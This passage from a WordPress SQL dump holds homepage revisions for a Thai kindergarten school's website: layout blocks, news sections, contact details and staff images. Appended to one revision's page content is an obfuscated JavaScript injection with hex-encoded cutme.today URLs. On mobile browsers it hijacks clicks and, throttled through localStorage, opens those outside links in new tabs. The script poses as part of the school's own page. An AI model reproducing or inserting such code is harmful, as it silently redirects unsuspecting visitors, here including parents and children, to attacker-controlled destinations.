ps://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:58:56','2025-07-15 07:58:56','',19,'http://watprato.ssk.in.th/?p=695',0,'revision','',0),
(696,1,'2025-07-15 15:00:23','2025-07-15 08:00:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 